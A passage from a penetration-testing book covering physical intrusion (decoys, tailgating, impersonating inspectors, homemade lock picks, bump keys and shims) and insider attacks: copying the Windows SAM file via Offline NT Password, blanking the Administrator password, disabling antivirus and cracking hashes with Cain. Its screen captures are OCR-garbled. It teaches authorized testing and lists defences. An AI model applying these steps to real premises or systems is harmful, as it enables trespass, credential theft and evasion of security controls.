lower the chance of being confronted. If the exterior door is locked, the first decoy rings 
the bell and says she has an appointment with an employee. She can give the name of 
a real employee, researched from public sources or social engineering, or just a made- 
up name; the guard will probably let her in while he tries unsuccessfully to verify her 
appointment. 

When the door opens, the decoy holds the door open for the team member posing 
as the employee, who may even feign a card swipe as he enters. The decoy should walk 
directly toward the guard or lobby desk while the entrant team member peels off to- 
ward the elevator or stairs carrying his lunch. Again, joining a group returning from 
lunch will help as well. If multiple guards are on duty, the decoy holds the door for the 
second decoy, and so on until the guards are occupied. In most cases, there will be no 
more than two guards or receptionists at the lobby checkpoint. 

If the exterior door is unlocked but there is a locked interior door, the decoy(s) 
should still enter first and occupy the guard's attention while the entrant attempts to 
tailgate someone through the locked door. Timing is more critical in this case, and car- 
rying a bigger load may also help, something cumbersome enough to encourage an- 
other employee to hold the door open. Keeping with the lunch scenario, it could be 
made to look like multiple lunch orders in a cardboard box. 

Unlike the multitenant building scenario, in this environment, once you are past 
the lobby checkpoint, you most likely have access to the entire building. We'll talk a bit 
about what to do once you're inside a little later in this chapter. 
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Mantraps 

A mantrap is a two-door entry system. The entrant is allowed through the first door, 
which then closes and locks. Before the second or inner door unlocks and opens, the 
entrant must identify and authenticate himself. If he does not, he's trapped between the 
two doors and must be released by the security guard. Properly implemented and oper- 
ated, a mantrap cannot be directly subverted except by impersonation. This is difficult 
because you would have to obtain functional credentials and know a pin or, worse, use 
a biometric. It's just not a viable entry point at the testing level discussed in this book. 
When confronted with a mantrap, find a different way in or talk your way past it using 
the pretense that you are a visitor. 



Locked Doors 

If you plan to go places in a building without authorization, you should be prepared to 
tun into locked doors. During penetration tests, you may opt to subvert physical locks 
by picking, bumping, or shimming them, all of which are demonstrated in this section. 
Directly subverting biometric locks is difficult, time consuming, and beyond the scope 
of this book. We'll meet the challenge of the biometric access control in a low-tech 
fashion by waiting for someone to open it or by simply giving someone a convincing 
reason to open it for us. 

The Unmanned Foyer 

So you're past the main lobby, you've found an employee-only floor, and now you're 
stuck in the foyer between the elevators and the locked office doors. How do you get 
past them and into the offices beyond? You'll have to wait until either someone leaves 
the office to take the elevator or someone gets off the elevator and uses their key card 
to open the door. Like so many steps in a physical intrusion, you have to be prepared 
to present a convincing reason why you're waiting or loitering in that area. You may 
even be on camera while you're waiting. One simple way to do this is to feign a phone 
call. By talking on your mobile phone, you can appear to be finishing a conversation 
before entering the office. This is believable and can buy you quite a bit of time while 
you wait. 

You should position yourself near the door you want to enter. Should an employee 
exit to take the elevator or exit the building, keep talking on your phone, grab the door 
before it closes, and keep walking. If an employee arrives on the elevator and unlocks 
the door, grab the door handle or use your foot to prevent the door from closing en- 
tirely and latching. This will provide some space between you and the person who just 
entered. 

Conversing on a mobile phone can deter an employee from inquiring about your 
presence. In most cases, an employee won't interrupt you as long as you don't look out 
of place and your ID badge looks convincing. The gray hat hacker performing a physical 
intrusion must always seek to pre-answer questions that are likely to come up in an 
employee's mind, without speaking a word. 
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The Biometric Door Lock 

The biometric door lock is not infallible, but subverting it by emulating an employee's 
biometric attributes is more an academic exercise than a realistic way past the door. The 
easiest way to get past a biometric door is to follow someone through it or convince 
someone inside that they should open it for you. You could pose as a safety inspection 
official and ask to speak to the office manager. Every door opens for the fire inspector! 
Since these positions are often municipal and un-uniformed, they are easily imperson- 
ated. Before impersonating an official, know your state and local laws! Sometimes it's 
safer, but less effective, to impersonate a utility worker such as an employee of the tele- 
phone company or electric company. It's also more difficult because they have special- 
ized tools and in many cases are uniformed. If your target is a tenant in the building, 
claiming to work for the building management is relatively low risk, mostly effective, 
and does not require a uniform. 

The Art of Tailgating 

This chapter has suggested several times that the entrant attempt to follow an employee 
through an access-controlled door before the door has a chance to close. This is known 
as tailgating. It is a common practice at many companies despite being clearly prohib- 
ited by policy. It's no secret why, either: think of a long line of people opening and 
closing a door one at a time in order to "swipe in" individually. While this does happen 
at security-conscience companies, it doesn't happen at many other companies. Several 
people go through the door at once as a matter of simple logistics. This practice can be 
exploited to gain unauthorized entry to a facility. It's a matter of timing your opportu- 
nity and looking like you belong. Whether it's an exterior or interior door, pick a time 
of high-volume traffic and find a place to wait where you can see people approaching. 
Join them as they are funneling toward the entry and try to follow them in. Someone 
will likely hold the door for you, especially if you're holding something cumbersome. 

You will be most effective at this technique if you master fitting in with the crowd 
and timing your entry so that you do not arouse suspicion. You should also practice 
using your foot or grabbing the handle to prevent the door from completely closing 
and latching while you swipe your fake ID card. When practiced, it looks convincing 
from a short distance. The loud "pop" of the solenoid-activated lock can even be simu- 
lated with a sharp hard twist of the door handle. 

Physically Defeating Locks 

In some cases it may be advantageous to defeat a physical lock, such as a padlock on a 
fence gate, a door lock, or a filing cabinet lock. Most common locks can be easily de- 
feated by one of several methods with a little practice and some simple homemade 
tools. In this section, we'll demonstrate how to make three common lock-picking tools 
and then demonstrate how they can be used to open the same lock. To simplify this 
exercise, we'll use a common lock, the Master Lock No. 5 padlock, which is shown 
throughout the figures in this section. A Master Lock No. 5 padlock is inexpensive and 
can be purchased at almost any hardware store. It's an excellent example of the cylinder 
and pin, or "tumbler," technology used in most locks. 
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Before you attempt to defeat a mechanical lock, it's important to understand how a 
basic cylinder lock and key work. A lock is simply a piece of metal that has been drilled 
to accept a cylinder of metal, which is attached to a release or catch mechanism such as 
a door bolt. The cylinder rotates to activate the release and open the door, ffoles are 
drilled through the metal frame of the lock and into the cylinder. Small two-piece, 
spring-loaded pins are then positioned in the hole. The pins prevent the cylinder from 
rotating unless the line at which they are split lines up with the gap between the cylin- 
der and the lock frame. A slot into which a key fits is cut in the cylinder. When the key 
is inserted, the teeth of the key position each pin correctly so that their splits all line up 
and the cylinder can be rotated, as shown in Figure 5-1. 

While there are many variations on basic lock design, it is usually possible to open 
a lock without the key by manually manipulating the pins to line up with the cylinder. 
Two common ways to do this are picking and bumping. 

Making and Using Your Own Picks 

The first method we'll use to open our example lock is a classic pick. Pick tools come in 
a wide variety of shapes and sizes to accommodate both the variety of locks manufac- 
tured and the personal preference of the person using the tools. Although lock-picking 
tools are widely available online, it's easy to make a simple "snake rake" tool and a ten- 
sion wrench out of a hacksaw blade and open our lock. The tension wrench is used to 
place a gentle rotational shear load on the cylinder, while the rake tool is used to bounce 
the pins or tumblers. 
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CAUTION Before you order or make lock-picking tools, it’s wise to take a 
moment to understand your local and state laws, as simply possessing such 
tools is illegal in some areas if you are not a locksmith. 



Start with common hacksaw blades from the hardware store and cut them into us- 
able sizes, as shown in Figure 5-2. The left frame of Figure 5-2, starting from the top, 
shows a six-inch mini-hacksaw blade, a tension wrench made from the same, a com- 
mercial rake tool, a rake tool created from a hacksaw blade, and a piece of hacksaw 
blade prior to machining. To make the rake from a hacksaw blade, use a grinding wheel, 
Dremel tool, or hand file, as well as appropriate safety gear, to shape the blade to look 
like a commercial rake tool. Make sure as you work the metal that you repeatedly cool 
it in water so it does not become brittle. To create the tension wrench, you'll need to 
twist the metal in addition to shaping it with a grinder or Dremel tool to fit in the lock 
cylinder with enough room to use your rake. Twist it by holding it with a pair of pliers, 
heating it with a propane torch until the section you want to bend is glowing red, and 
then twisting it with another pair of pliers while it's still glowing. Immediately cool it 
in water. There are good video tutorials available online that show how to make your 
own lock-picking tools and also cover the finer points of working with metal. 

To use your newly made tools, insert the tension wrench into the lock cylinder and 
maintain a gentle rotational pressure as you bounce the pins up and down by moving 
the rake in and out, as shown in the right panel of Figure 5-2. The correct pressure will 
be one that allows the pins to move but causes them to stick in place when they align 
with the cylinder wall. It will take a few tries and some patience, but when you get it 
right, the lock cylinder will turn, opening the lock. Your first attempt at the Master Lock 
No. 5 padlock may take a half hour or more to succeed, but with a few hours of prac- 
tice, you'll develop a feel for the proper tension and should be able to open it in two or 
three quick tries. The picking principal is the same for any cylinder lock, but the tech- 
nique and tools required may vary depending on the complexity, number, and arrange- 
ment of the security pins or tumblers. 

Making and Using a Bump Key 

Lock "bumping" builds on the principal of picking but can be much faster, easier, and 
a lot less obvious. A bump key is a key that fits the cylinder keyway and is cut with one 
uniform-sized tooth for each security pin in a given lock, four in our example. Every 
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lock has a specific number of security pins. In our example, the number can be deter- 
mined by looking at the number of valleys between the teeth of the original key each 
of which corresponds to an individual pin. A more experienced user will have an assort- 
ment of bump keys arranged by lock manufacturer, model, and security pin count. The 
key is partially inserted into the lock and then tapped with a small hammer while 
maintaining a gentle rotational pressure on the key. This causes the pins to jump up- 
ward simultaneously. As they spring back into their static position, the slight rotational 
pressure on the lock cylinder causes them to stick, similar to the picking method. 

In order to demonstrate this on our example lock, we'll use the spare key provided 
with the lock and file a uniform tooth for each security pin in our lock. You need one 
tooth for each pin so that you can bounce them all at once when you strike the key with 
the hammer. In the left pane of Figure 5-3, the top key is the actual key to the lock and 
the lower key is the bump key worked from the spare with a Dremel tool. In our ex- 
ample, we'll use a screwdriver handle as our hammer. Insert the key into the lock with 
one key valley remaining outside the keyway, which is three pins in our example. Apply 
some slight clockwise pressure and tap it with the hammer, as shown in the right pane 
of Figure 5-3. As with basic lock picking, this technique requires patience and practice 
to develop a feel for how much rotational pressure to keep on the key and how hard to 
tap it with the hammer. While bumping can be faster and easier than picking, you'll 
need to have a key that fits the cylinder keyway and number of pins for each lock you 
want to open with this method. 

Making and Using a Shim 

Some padlocks, both key and combination, retain the security hoop by inserting a 
small metal keeper into a groove, as shown in the center pane of Figure 5-4. When the 
key is inserted or the combination turned, the keeper moves out of the groove to free 
the metal security hoop. This is true for our example lock, which uses two such keeper 
mechanisms. The keeper is often spring loaded, so it is possible to forcibly push it aside 
and free the hoop by using a simple shim. While commercial shims are widely avail- 
able, we'll construct ours using the thin metal from a beverage can. 

Using the pattern shown in the left frame of Figure 5-4, carefully cut two shims 
from beverage can metal using scissors. Because the metal is very thin, fold it in half 
before cutting to make a stronger shim. After cutting the shim tongue, fold the top part 
down two or three times to form a usable handle. Be very careful cutting and handling 
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beverage can metal as it can be razor sharp! Next, pre-bend your shims around a small 
cylindrical object such as a pencil or pen until they look like the one at the bottom of 
the left frame of Figure 5-4. Now carefully insert the shim into the gap between the lock 
frame and security loop to one side of the keeper mechanism. Then, insert the second 
shim. When both shims are fully inserted, rotate them to position the shim tongue 
between the keeper and the security loop, as shown in the right frame of Figure 5-4. 
With both shims in place, the security hoop may now be pulled open. Beverage can 
shims are very fragile and will most likely only work once or twice before tearing apart 
inside the lock. This can permanently damage the lock and prevent it from opening 
again even with the key. 



Once You Are Inside 

The goal of entering the building is to gain access to sensitive information as part of the 
penetration test. Once you are past the perimeter access controls of the building, you 
have to find your way to a location where you can work undisturbed or locate assets 
you want to physically remove from the building. Either way, you'll likely go into the 
building without knowing the floor plan or where specific assets are located. Walking 
blindly around searching for a place to work is the most difficult part of the physical 
intrusion process. It's also when you're most likely to be exposed or confronted. 

Unless your goal is to take backup tapes or paper, you'll probably want access to the 
data network. A good place to get that access is in a conference room, as most of them 
have data network ports available. A company that is following industry best practices 
will have the data ports in their conference rooms on a guest network that is not di- 
rectly connected to the corporate local area network. If this is the case, you can still use 
the conference room as a base of operations while you attempt to gain access to the 
data network. You may consider using the Trojan USB key technique described in Chap- 
ter 4 to quickly establish remote access. 

Another possible location to operate from is an empty cubicle or office. Many com- 
panies have surplus work space from downsizing or for future growth. It's easy to "move 
in" to one of these over lunch or first thing in the morning. You will have to have a 
cover story handy, and your window of opportunity may be limited, but you will most 
likely have full access to the network or perhaps even a company computer left in the 
cubicle or office. Techniques for utilizing company computing assets for penetration 
testing are discussed in Chapter 6. 
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Defending Against Physical Penetrations 

You might assume that protecting a company's informational assets from a physical 
intrusion is covered under its existing security measures, but often that's simply not the 
case. Understandably, these same assets must be available to the employees so that they 
can perform their work. All an attacker has to do to obtain physical access to the data 
network infrastructure is to look convincingly like an employee or like they belong in 
the building for another reason. With physical access, it is much easier to gain unau- 
thorized access to sensitive information. 

In order to successfully defend against a physical penetration, the target company 
must educate its employees about the threat and train them how best to deal with it. 
Data thefts often are not reported because the victim companies seek to avoid bad press, 
in which cases the full extent of the threat is not experienced by the people handling the 
data. In addition, employees often don't understand the street value of the data they 
handle. The combination of hidden threat and unperceived value makes training in this 
area critically important for a successful policy and procedure program. 

Perhaps the single most effective policy to ensure that an intruder is noticed is one 
that requires employees to report or inquire about someone they don't recognize. Even 
employees at very large corporations encounter a regular group of people on a daily 
basis. If a policy of inquiring about unfamiliar faces can be implemented, even if they 
have a badge, it will make a successful intrusion much more difficult. This is not to say 
that an employee should directly confront a person who is unfamiliar to them, as they 
may actually be a dangerous intruder. That's the job of the company's security depart- 
ment. Rather, employees should ask their direct supervisor about the person. 

Other measures that can help mitigate physical intrusions include the following: 

• Key card turnstiles 

• Manned photo ID checkpoints 

• Enclosed or fenced smoking areas 

• Locked loading area doors, equipped with doorbells for deliveries 

• Mandatory key swipe on entry/re-entry 

• Rotation of visitor badge markings daily 

• Manned security camera systems 
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In the previous two chapters, we've discussed some up-close and personal ways of ob- 
taining access to information assets during a penetration test by using social engineer- 
ing and physical attacks. Both are examples of attacks that a motivated intruder might 
use to gain access to the information system infrastructure behind primary border de- 
fenses. In this chapter, we'll discuss attacking from the perspective of someone who 
already has access to the target's information systems: an insider. 

Testing from the insider perspective is a way to assess the effectiveness of security 
controls that protect assets on the local network. Unauthorized insider access is a com- 
mon factor in identity theft, intellectual property theft, stolen customer lists, stock ma- 
nipulation, espionage, and acts of revenge or sabotage. In many cases, the actors in such 
crimes are privileged network users, but in some cases — identity theft, for instance — the 
accounts used might have minimal privileges and may even be temporary. 

The reasons to conduct a simulated attack from the insider perspective are many. 
Foremost among those reasons is that you can learn many details about the overall se- 
curity posture of the target organization that you can't learn from an external-only 
penetration test, especially one that doesn't successfully subvert the border controls. 
Even in a large company, the insiders represent a smaller field of potential attackers 
than the public Internet, but the potential for damage by insiders is demonstrably 
greater. The insider typically has a working knowledge of the company's security con- 
trols and processes as well as how and where valuable information is stored. 

In this chapter, we discuss the following topics: 

• Why simulating an insider attack is important 

• Conducting an insider attack 

• Defending against insider attacks 

Why Simulating an Insider Attack Is Important 

The importance of assessing an organization's vulnerability to attack from the inside is 
virtually self-evident. With the exception of the very small company, hired employees 
are essentially strangers a company pays to perform a task. Even when background 
checks are performed and references are checked, there is simply no guarantee that the 
people tasked with handling and processing sensitive data won't steal or misuse it. The 
higher the privilege level of the user, the more trust that is placed in that person and the 
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more risk that is incurred by the company. For this reason, companies often spend a 
significant amount of money on security controls and processes designed to control 
access to their information assets and IT infrastructure. 

Unfortunately, most companies do not test these same systems and processes un- 
less they are in a regulated industry such as banking or they've been the victim of an 
insider attack. Even worse, many companies assign the task of testing the controls to 
highly privileged employees, who actually pose the greatest risk. In order for an organi- 
zation to truly understand how vulnerable it is to an attack by an insider, it must have 
an independent third party test its internal controls. 

Conducting an Insider Attack 

Conducting an attack from the inside can be accomplished by using familiar tools and 
techniques, all of which are found in this book. The primary difference is that you will 
be working inside the target company at a pre-specified privilege level of an employee, 
complete with your own network account. In most cases, you can arrange for a private 
place to work from, at least initially, but in some cases you may have to work out in the 
open in the presence of other employees. Both scenarios have their advantages; for ex- 
ample, whereas working in private allows you to work undisturbed, working with other 
employees allows you to get up to speed on security procedures more quickly. 

No matter where you wind up working, it's a given that you must be able to explain 
your presence, as any newcomer is likely be questioned by curious coworkers. These 
encounters are far less stressful than encounters during social engineering or physical 
intrusions because you are legitimately working for someone at the target company and 
have an easy cover story. In most cases, a simple "consulting" explanation will suffice. 

In all cases, the fewer people at the target company that are aware of your activities, the 
more realistic the test will be. If the help desk staff or system administrators are aware 
that you are a gray hat posing as an employee with the intent of subverting security 
controls, they will be tempted to keep a close eye on what you're doing or, in some 
cases, even give you specially prepared equipment to work from. 

For this chapter, we'll examine a hypothetical company call ComffugeCo Ltd. We've 
been given a Windows domain user account called MBryce with minimal privileges. 

We'll attempt to gain domain administrator rights in order to search and access sensi- 
tive information. 

Tools and Preparation 

Each test will be slightly different depending on the environment you are working 
within. It's best to work from equipment supplied by the target organization and begin 
with very little knowledge of the security controls in place. You should arrive prepared 
with everything you need to conduct your attack since you may not have an opportu- 
nity to download anything from the outside once you're in. At the time of this writing, 
most companies use content filters. A good network security monitoring (NSM) system 
or intrusion detection system (IDS) operator will also notice binary downloads coming 
from hacking sites or even unfamiliar IP addresses. Have all the tools you are likely to 
need with you on removable media such as a USB drive or CD. 
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Since you may find the equipment provided fully or partially locked down, hard- 
ened, or centrally controlled, you should also have bootable media available to help 
you access both the individual system and the network at a higher privilege level than 
afforded your provided account. In the most difficult cases, such as a fully locked CMOS 
and full disk encryption, you may even want to bring a hard drive with a prepared op- 
erating system on it so that you can attempt to gain access to the subject network from 
the provided equipment. Having your tools with you will help you stay under the radar. 
We'll discuss a few practical examples in the following sections. 

Orientation 

The most common configuration you'll encounter is the Windows workstation, a stand- 
alone PC or laptop computer running a version of Microsoft Windows. It will most 
likely be connected to a wired LAN and utilize the Windows domain login. You'll be 
given a domain account. Log in and have a look around. Take some time to "browse" 
the network using the Windows file explorer. You may see several Windows domains as 
well as drives mapped to file servers, some of which you may already be connected to. 
The whole point of the insider attack is to find sensitive information, so keep your eyes 
open for servers with descriptive names such as "HR" or "Engineering." Once you feel 
comfortable that you know the bounds of your account and have a general view of the 
network, it's time to start elevating your privilege level. 

Gaining Local Administrator Privileges 

The local operating system will have several built-in accounts, at least one of which will 
be highly privileged. By default, the most privileged account will be the Administrator 
account, but it's not uncommon for the account to be renamed in an attempt to ob- 
scure it from attackers. Regardless of what the privileged account names are, they will 
almost always be in the Administrators group. An easy way to see what users are mem- 
bers of the local Administrators group of an individual machine is to use the built-in 
net command from the command prompt: 

net localgroup Administrators 

In addition to the Administrator account, there will often be other privileged ac- 
counts owned by the help desk and system administration groups within the company. 
For the purposes of our example, our machine uses the Windows default Administrator 
account. 

The easiest way to gain access to the Administrator account is to reset its password. 
In order to do this while the operating system is running, you'd need to know the exist- 
ing password, which you probably won't. Windows protects the file that contains the 
password hashes, the SAM file, from being accessed while the OS is running. While 
there are exploits that allow access to the file's contents while Windows is running, do- 
ing so may set off an alert if a centrally managed enterprise antivirus system is in place. 
Dumping the SAM file only gives you the password hashes, which you then will have 
to crack. While recovering the local Administrator password is on our agenda, we'll re- 
move the password from the Administrator account altogether. We'll collect the SAM 
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file and hashes along the way for cracking later. To do this, we'll boot the system from 
a CD or USB drive and use the Offline NT Password and Registry Editor tool (referred 
to hereafter as "Offline NT Password" for short). 

Most computers boot from removable media such as a CD-ROM or floppy disk 
when they detect the presence of either. If nothing is detected, the machine then boots 
from the first hard drive. Some machines are configured to bypass removable media 
devices but still provide a boot menu option during power-up. This menu allows the user 
to select which device to boot from. Our example uses the Phoenix BIOS, which allows 
the user to select a boot device by hitting the ESC key early in the boot process. In the 
worst case, or the best configurations, the boot menu will be password protected. If 
that's the case, you'll have to try dumping the SAM file with an exploit such as pwdump7 
while the machine is running. Alternatively, you can install a hard drive of your own as 
primary to boot from and then access the target Windows drive as a secondary to re- 
cover the SAM file. 

Offline NT Password is a stripped-down version of Linux with a menu-driven inter- 
face. By default, it steps you through the process of removing the Administrator account 
password. While we have the Windows file system accessible, we'll also grab the SAM 
file before we remove the Administrator password. If you choose to boot Offline NT 
Password from a CD, make sure that you first insert a USB thumb drive to copy the SAM 
file to. This will make mounting it much easier. 

Using Offline NT Password and Registry Editor 

Offline NT Password runs in command-line mode. Once booted, it displays a menu- 
driven interface. In most cases, the default options will step you through mounting the 
primary drive and removing the Administrator account password, as described next. 

Step One The tool presents a list of drives and makes a guess as to which one con- 
tains the Windows operating system. As you can see from Figure 6-1, it also detects in- 
serted USB drives. This makes mounting them much easier, because if you insert one 
later, the tool often will not create the block device (/dev/sdbl) necessary to mount it. 

In this case, the boot device containing Windows is correctly identified by default, 
so simply press enter to proceed. 

Step Two Next, the tool tries to guess the location of the SAM file. In Figure 6-2, we 
can see that it is correctly identified as located in WINDOWS/system32/config. 



Figure 6-1 

Selecting the boot 
device 



■ Step ONE: Select disk where the Windows installation is 



D i sks : 

Disk /deu/sda: 8589 MB, 8589934592 bytes 

Disk /deu/sdb: 2047 MB, 2047678976 bytes, REMOURBLE 

Candidate Windows partitions found: 

1 : /deu/sdal 8181MB BOOT 

2 : /dev/sdbl 1950MB (USB?) 

Please select partition by number or 

3 = qu i t 

= automatically start disk drivers 
m = manually select disk drivers to load 
f = fetch additional drivers from floppy / usb 
a = show all partitions found 

1 = show propbab le Windows (NTFS) partitions only 

Select: C li 
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Figure 6-2 

Finding the SAM file 



■ _Step_THO :__Se lect _PATH_and_req istrv_f i les 

What is the path to the registry directory? (relative to uindous disk) 
[ H INDOHS/systew32/conf lg] 

EXPAND HINDOHS/systeM32/conf ig 



-ruxruxrux 



1 0 



0 



2C2144 May 25 
262144 May 25 
262144 May 25 
9961472 May 25 

471 li§l Ht? 

262144 May 24 



2010 GflH 
2010 SECURITV 
2010 default 
2010 software 



Se 1 
I r - 




ect which part 

1 i at the files 
Password reset 

RoeouoryConco 1 

quit - return 



of registry 

with space a 
C sam system 
e parameters 
to previous 



predef ined 



cho ices 



Again, the correct action is preselected from the menu by default. Before continu- 
ing, however, we want to copy the SAM file to the USB drive. Since Offline NT Password 
is built on a simple Linux system, we can invoke another pseudo-terminal by pressing 
alt-f2. This opens another shell with a command prompt. Mount the USB drive using 
the device name identified in step one and shown in Figure 6-1: 



mount /dev/sdbl /mnt 



Next, copy the SAM and SECURITY files to the USB drive. Offline NT Password 
mounts the boot disk in the directory /disk. 



cp /drive/WINDOWS/system32/conf ig/SAM /mnt 
cp /drive/WINDOW/system32/conf ig/SECURITY /mnt 



Make sure you perform a directory listing of your USB drive to confirm you've cop- 
ied the files correctly, as shown here: 




cl O C Ll hi 

tt _ 



/mnt 



Now return to the menu on pseudo-terminal one by pressing alt-f1, and then press 
enter to accept the default location of the SAM file. 

Step Three The tool will now look into the SAM file and list the accounts. It will 
then give you the option to remove or replace the selected account password. By de- 
fault, the Administrator account will be selected, as shown here: 



<>========<> chntpw 

Loaded hives: <SHM> 



< syst em > 



■ract ive Menu <>= 
< SECUR I T V > 



1 — Edit: user data and passwords 

2 — Syskey status & change 

3 - RecoveryConso le settings 



support t 
something t 



o save) 



What to do? Cll -> 



chntpw Edit User Info & Passwords ==== 



RID - ! Usernai 

0 1 f 4 ! Administrator 

0 1 f 5 S Guest 
03e8 ! He IpAss istant 

03ea ! SUPPOR T_388945a0 



d is/ lock 
d is/ lock 
d is/ lock 



Select: f — quit, — list users, 0x < R I D > — User with RID (hex) 

or simply enter the username to change: [Administrator] 
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Once selected, the default option is to simply remove the password, as shown next. 
Although there is an option to reset the password to one of your own choosing, this is 
not recommended because you risk corrupting the SAM file. Press enter to accept the 
default. 



R ID 

Useniatie 
ful 1 name 
comment 
homed i r 



0500 [ 01f 41 
Administrator 

Built-in account for 1 administering the computer/domain 



User is member of 1 groups: 

00000220 = Administrators (which has 2 members) 



Account bits: 0x0210 

“3D i sab led 

3 Temp, duplicate 

3 Domain trust ac 

X 3 Pwd don’t exp i r 

3 (unknown 0x10) 



3 Homedir req. 

X3 Normal account 

3 Hks trust act. 

3 Auto lockout 

3 (unknown 0x20) 






Passwd not req . 
NHS account 
Sru trust act 
(unknown 0 x 08 ) 
(unknown 0x40) 



Failed login count: 0 , while max tries is: 0 

Total log in count: 2 



— — - - User Edit Menu: 

1 - Clear (blank) user password 

2 - Edit (set new) user password (careful with this 

3 - Promote user ( make user an adm in istrator) 

(4 — Unlock and enable user account) [seems unlocked 

q — Quit editing user, back to user select 

Select: [q] > 1 

Password cleared* 



on X P or 
a 1 ready 3 



U i st a ) 



Select: f — quit, — list users, 0 x < R I D > - User with RID (hex) 

or simply enter the username to change: [Administrator! _ 



Step Four Once the password is successfully removed from the SAM file, it must be 
written back to the file system. As shown here, the default option will do this and report 
success or failure, so press enter: 



Select: ♦ — quit, - list users, 0x<RID> — User with RID (hex) 

or simply enter the username to change: [Administrator] f 



<>========<> chntpw Main Interactive Menu (>========() 

Loaded hives: <SRM> (system) (SECURITV) 

1 — Edit user data and passwords 

2 — Syskey status d change 

3 — Recover yConso 1 e settings 

9 — Registry editor, now with full write support* 
q - Quit (you will be asked if there is something to save) 



Nhat to do? C13 -> q 



H i ves that 
# Name 

0 (SAM) 



have changed : 
OK 



■ _Step_FOUR^_Mritinq_back_chanqes 

Rbout to write file(s) back* Do it? [ n 3 y 

Writing SRM 

***** EDIT COMPLETE ***** 

You can try again if it somehow failed, or you selected wrong 

New run? [n3 _ 

With the SAM file successfully written back to the file system, simply press enter 
for the default option to not try again, and the menu will exit. Remove the CD and 
reboot the system. You will now be able to log in as the local Administrator with no 
password. 



Recovering the Administrator Password 

Despite widely publicized best practices, in more cases than not the LAN Manager (LM) 
hash for the Administrator account will still be present on the local machine. This hash 
can easily be cracked to reveal the local Administrator account password. This password 
will almost never be unique to just one machine and will work on a group of comput- 
ers on the target network. This will allow virtually full control of any peer computer on 
the network that shares the password. 
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Since you're on the client's site and using their equipment, your choices may be 
more limited than your lab, but options include: 

• Bringing rainbow tables and software with you on a large USB hard drive 

• Using a dictionary attack with Cain or LOphtCrack 

• Taking the SAM file back to your office to crack overnight 

• Sending the SAM file to a member of your team on the outside 

If you are working as a team and have someone available offsite, you may want to 
send the hashes to your team across the Internet via e-mail or web-based file sharing. 
This does present a risk, however, as it may be noticed by vigilant security personnel or 
reported by advanced detective controls. If you do decide to send the hashes, you should 
strongly encrypt the files, not only to obscure the contents but also to protect the hash- 
es from interception or inadvertent disclosure. In our example, we'll use Cain and rain- 
bow tables from a USB hard drive running on the provided equipment now that we can 
log in as the local Administrator with no password. 

Disabling Antivirus 

Cain, like many gray hat tools, is likely to be noticed by almost any antivirus (AV) prod- 
uct installed on the system you're using. If Cain is detected, it may be reported to the 
manager of the AV product at the company. Disabling AV software can be accomplished 
in any number of ways depending on the product and how it's configured. The most 
common options include: 

• Uninstall it (may require booting into Safe Mode) 

• Rename the files or directories from an alternative OS (Linux) 

• Suspend the process or processes with Sysinternals Process Explorer 

An AV product is typically included in the standard disk image used during the 
workstation provisioning process. Finding the AV product on the computer is usually a 
simple process, as it likely has a user-level component such as a tray icon or an entry in 
the Programs menu off the Start button. In their simplest forms, AV products may sim- 
ply be removed via the Add or Remove Programs feature located in the Control Panel. 
Bear in mind that after you remove the AV product, you are responsible for the com- 
puter's safety and behavior on the network, as AV is a first-line protective control. The 
risk is minimal because typically you're not going to use the computer to access web- 
sites, read e-mail, instant message, or perform other high-risk activities. 

If you are having difficulty uninstalling the AV product, try booting into Safe Mode. 
This will limit which applications are loaded to a minimum, which in many cases will 
negate the active protective controls built into AV products allowing you to uninstall 
them. 

If the product still will not uninstall even while in Safe Mode, you may have to boot 
the computer with an alternative OS that can mount an NTFS file system in read/write 
mode, such as Ubuntu or Knoppix. Once the NTFS is mounted under Linux, you can 
then rename the files or directory structure to prevent AV from loading during the boot 
process. 
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As an alternative, you may suspend the AV processes while you work. This may be 
necessary if the AV product is difficult to uninstall from the local machine without per- 
mission from the centralized application controller located somewhere else on the net- 
work. In some cases where an enterprise-level product is in use, the AV client will be 
pushed back onto the workstation and reinstalled if it's not detected during periodic 
sweeps. You can use Sysinternals Process Explorer, procexp, to identify and suspend the 
processes related to the AV product. You may need to play with permissions to achieve 
this. To suspend a process using procexp, simply right-click the desired process from the 
displayed list and select Suspend from the drop-down menu, as shown in Figure 6-3. To 
resume the process, right-click it and select Restart from the drop-down menu. 

While the processes are suspended, you will be able to load previously prohibited 
tools, such as Cain, and perform your work. Keep in mind that you must remove your 
tools when you are finished, before you restart the AV processes, or their presence may 
be reported as an incident. 

Raising Cain 

Now that AV is disabled, you may load Cain. Execute the ca_setup.exe binary from your 
USB thumb drive or CD and install Cain. The install process will ask if you would like 
to install WinPcap. This is optional, as we will not be performing password sniffing or 
man-in-the-middle attacks for our simulated attack. Cain is primarily a password- 
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auditing tool. It has a rich feature set, which could be the subject of an entire chapter, 
but for our purposes we're going to use Cain to 

• Recover the Administrator password from the SAM file 

• Identify key users and computers on the network 

• Locate and control computers that use the same local Administrator password 

• Add our account to the Domain Administrators group 

Recovering the local Administrator Password 

With Cain running and the USB drive containing the recovered SAM file from the previ- 
ous section inserted, click the Cracker tab, and then right-click in the empty workspace 
and select Add to List. Click the Import Hashes from a SAM Database radio button and 
select the recovered SAM file from the removable drive, as shown here: 




Next you'll need the boot key. This is used to unlock the SAM file in the event it is 
encrypted, as is the case in some configurations. Click the selection icon (...) to the 
right of the Boot Key (HEX) text box, and then click the Local System Boot Key button, 
as shown here: 
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Select and copy the displayed key, click Exit, and then paste the key into the Boot Key 
(HEX) text box. Click the Next button and the account names and hashes will appear 
in the Cracking window. 

In our example, we're going to recover the password using a cryptanalysis attack on 
the LM hashes. Using presorted rainbow tables, on a 1TB USB hard drive in this case, 
and Cain's interface to the Rainbow Crack application, most passwords can be recov- 
ered in under 30 minutes. Right-click in the workspace of the Cracker section of Cain 
and select Cryptanalysis Attack | LM Hashes | via RainbowTables (RainbowCrack), as 
shown here: 
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Next you'll be prompted to select the rainbow table files to process, in this case 
from the USB device. After the processing is complete, found passwords will be dis- 
played in the Cracker section next to the account name. The lock icon to the left will 
change to an icon depicting a ring of keys, as shown here: 
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Now that we know what the original local Administrator password was, we can 
change it back on our machine. This will allow us to easily identify other machines on 
the network that use the same local Administrator password as we continue to investi- 
gate the network with Cain. 



Identifying Who’s Who 

Cain makes it easy to identify available domains, domain controllers, database servers, 
and even non-Windows resources such as Novell NetWare file servers. Cain also makes 
it easy to view both workstation and server machine names. Most companies use some 
sort of consistent naming convention. The naming convention can help you identify 
resources that likely store or process sensitive information; for example, a server named 
paychex might be worth looking at closely. 
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Using Cain's enumeration feature, it is possible to view user account names and any 
descriptions that were provided at the time the accounts were created. Enumeration 
